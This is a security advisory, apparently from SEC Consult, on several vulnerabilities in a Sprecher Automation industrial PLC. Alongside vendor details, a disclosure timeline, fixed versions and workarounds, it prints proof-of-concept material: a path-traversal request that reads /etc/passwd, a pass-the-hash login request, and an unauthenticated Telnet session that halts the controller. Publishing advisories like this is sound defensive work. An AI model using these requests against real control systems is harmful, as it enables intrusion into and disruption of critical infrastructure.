### VENDOR DESCRIPTION“Sprecher Automation GmbH offers switchgears and automation solutions for energy, industry and infrastructure processes. Our customers are power utilities, industries, transportation companies, municipal utilities and public institutions.Company-own developments and cooperations with technology partners lead to a unique product portfolio consisting of traditional electrical technologies as well as high-tech electronics.”Source: https://www.sprecher-automation.com/en/### BUSINESS RECOMMENDATIONSEC Consult recommends to immediately patch the systems and follow the hardening guide provided by the vendor (SEC Consult did not have access to the hardening guide in order to review it).A thorough security review should be performed by security professionals as further security issues might exist within the product.### VULNERABILITY OVERVIEW AND DESCRIPTION#### 1) Authenticated Path Traversal VulnerabilityThe web interface of the Sprecher PLC suffers from a path traversal vulnerability. A user which is authenticated on the web interface, which is intended as read-only interface, can download files with the permissions of the webserver (www-data). Files like “/etc/shadow” are not readable for the webserver.#### 2) Client-Side Password HashingThe password hashes which are stored on the system can be directly used to authenticate on the web interface (pass-the-hash) since the password is hashed in the browser of the user during login.#### 3) Missing AuthenticationThe PLC exposes a Telnet management service on TCP port 2048. This interface can be used to control the PLC and does not require any authentication.#### 4) Permanent Denial of Service via PortscanAn aggressive TCP SYN scan on a large amount of ports triggers a denial of service of the PLC service. This results in an persistent DoS of the standby PLC in an active – standby pair. Manual operator intervention is required to restore service availability.#### 5) Outdated Linux KernelAn ancient Linux kernel version with a high number of known security weaknesses is used for the PLC base operating system.### PROOF OF CONCEPT#### 1) Authenticated Path Traversal VulnerabilityReading “passwd” is possible by triggering the following request:“`GET /webserver/cgi-bin/spre.cgi?4_1=../../../../../../../etc/passwd HTTP/1.1Host: <IP-Address>Cookie: sid=<SESSION-ID>Connection: closeUpgrade-Insecure-Requests: 1The file is directly fetched from the system:root:x:0:0:root:/root:/bin/shdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:100:sync:/bin:/bin/syncmail:x:8:8:mail:/var/spool/mail:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shoperator:x:37:37:Operator:/var:/bin/shhaldaemon:x:68:68:hald:/:/bin/shdbus:x:81:81:dbus:/var/run/dbus:/bin/shnobody:x:99:99:nobody:/home:/bin/shsshd:x:103:99:Operator:/var:/bin/sh[…]“`#### 2) Client-Side Password HashingThe passwords are hashed in JavaScript before they are transmitted to the device. Therefore the hash is as good as the password. The following request shows a login process:“`POST /webserver/cgi-bin/spre.cgi HTTP/1.1Host: <IP-Address>User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: application/jsonAccept-Language: deContent-Type: application/x-www-form-urlencodedIf-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMTReferer: http://<IP-Address>/Webserver.html?locale=deContent-Length: 57Connection: closecgi_time&user=admin&pswd=<md5-hash>“`#### 3) Missing AuthenticationAn administrative interface was presented after connecting to port 2048 via Telnet:“`$ telnet <IP-Address> 2048100 OK: Portable IEC 61131-3 RT Scheduler for Linux (RTK) $Revision: 1.17 $Scheduling mode: application timer/timer-tick preservingCopyright (c) kirchner SOFT GmbH 1994-2002. All rights reserved.HELP104 OK: Portable IEC 61131-3 RT Scheduler for Linux (RTK) $Revision: 1.17 $Scheduling mode: application timer/timer-tick preservingCopyright (c) kirchner SOFT GmbH 1994-2002. All rights reserved.HELP, ? …………………….. show this helpQUIT, EXIT ………………….. quit command sessionSTOP ……………………….. stop executionCONT [TASK|EP] <id> ………….. continue executionSTRT ……………………….. start systemREST ……………………….. restart system if breakedHALT ……………………….. quit schedulerSHOW [TASKS|SCHED|REVISIONS] ….. show informationSHOW [BREAKPOINTS] …………… show breakpoint listEXEC <TASK> <id> …………….. execute a taskEXEC_MS <ms> [flags] …………. execute code for a specific timeEXEC_CYCLES <no> [flags] ……… execute code for cyclesSTEP TASK <id> <INTO|OVER|OUT> … single step (task)STEP EP <id> <INTO|OVER|OUT> ….. single step (task of EP)ADD_BREAKPOINT <bp> ………….. add breakpointDELETE_BREAKPOINT <bp|ALL> ……. delete breakpointsENABLE_BREAKPOINT <bp|ALL> ……. enable breakpointsDISABLE_BREAKPOINT <bp|ALL> …… disable breakpointsREAD <variable> ……………… read variable as stringREAD_LONG <variable> …………. read variable as longREAD_DOUBLE <variable> ……….. read variable as doubleWRITE <variable> <value> ……… write variable with string const.WRITE_LONG <variable> <value> …. write variable with long valueWRITE_DOUBLE <variable> <value> .. write variable with double valueGET_LONGNAME <variable> ………. get variable informationGET_TYPENAME <variable> ………. get variable informationCHECK_VAR <variable> …………. check if variable existsUSER name …………………… identify userPASS pw …………………….. authenticate with passwordBIN ………………………… switch to binary protocol modeThe PLC can be restarted with the “HALT” command (PLC returns after about 30 seconds):HALT200 OK: shutting down application tasks201 OK: waiting for application tasks202 OK: shutting down systemConnection closed by foreign host.“`#### 4) Permanent Denial of Service via PortscanAn aggressive portscan triggered a persistent denial of service of the standby PLC in an active – standby setup.#### 5) Outdated Linux KernelBy using the path traversal vulnerability (1) the Linux kernel version has been retrieved:“`Linux version 2.6.20-sp16 (kd@jeannie) (gcc version 4.4.6 (Buildroot 2011.05))#1 PREEMPT Mon Feb 29 12:06:28 CET 2016“`### VULNERABLE VERSIONSThe following versions are affected by the identified vulnerabilities:* Authenticated Path Traversal Vulnerability * all versions < 8.49* Client-Side Password Hashing * all versions < 8.49* Missing Authentication * all versions* Permanent Denial of Service via Portscan * all versions* Outdated Linux Kernel * all versions < 8.49### VENDOR CONTACT TIMELINE* 2017-09-22: Requesting vendor security contact and encryption keys* 2017-09-25: Vendor provides S/MIME certificate for encryption* 2017-09-25: Advisory is submitted to the vendor* 2017-09-25: Call with vendor contact. Contact states that the vulnerabilities are known and fixed in different newer firmware versions. Contact will provide a list of firmware versions with the fixes.* 2017-10-02: Requesting update.* 2017-10-02: Vendor states they will provide feedback by the following week.* 2017-10-12: SEC Consult sends reminder for requested information.* 2017-10-13: Vendor states they will provide missing information until 2017-10-20.* 2017-10-20: Vendor requested some more time (2017-11-03) to prepare hardening guide to be linked in advisory.* 2017-11-03: Vendor provides affected and fixed versions, workaround information and reference to hardening guideline* 2018-01-29: Vendor provides an update regarding the hardening guide document ID. It was changed to from 94.2.915.95 to 94.2.913.50.* 2018-01-30: Vendor requested changes for the “passwd” file in the advisory. Removed the vendor-specific user accounts in the PoC.* 2018-01-31: Coordinated public release.### SOLUTION* Authenticated Path Traversal Vulnerability * Fixed in version 8.49 (available since 2016-05-13)* Client-Side Password Hashing * Fixed in version 8.49 (available since 2016-05-13)* Missing Authentication * see workaround* Permanent Denial of Service via Portscan * see workaround* Outdated Linux Kernel * Fixed in version 8.49 (available since 2016-05-13)### WORKAROUND#### 1) Authenticated Path Traversal VulnerabilityAs a workaround, if a firmware update is not feasible due to operational constraints, the webserver can be deactivated. The webserver is not necessary for operation, as all maintenance can be done via the SPRECON-E service program.#### 2) Client-Side Password Hashingsee (1)#### 3) Missing AuthenticationRemote debugging of the Software-PLC is possible via the “secure service channel” instead of this Telnet service. The optional Telnet service can be disabled to mitigate this vulnerability. (According to the vendor it is disabled by default.)See the vendor’s hardening guideline available for all registered customers: https://download.sprecher-automation.com/de/login (document ID 94.2.913.50).#### 4) Permanent Denial of Service via PortscanAccording to the vendor the denial of service via portscan can be mitigated using the packet filter. See the vendor’s hardening guideline available for all registered customers: https://download.sprecher-automation.com/de/login (document ID 94.2.913.50).#### 5) Outdated Linux Kernelno workaround available
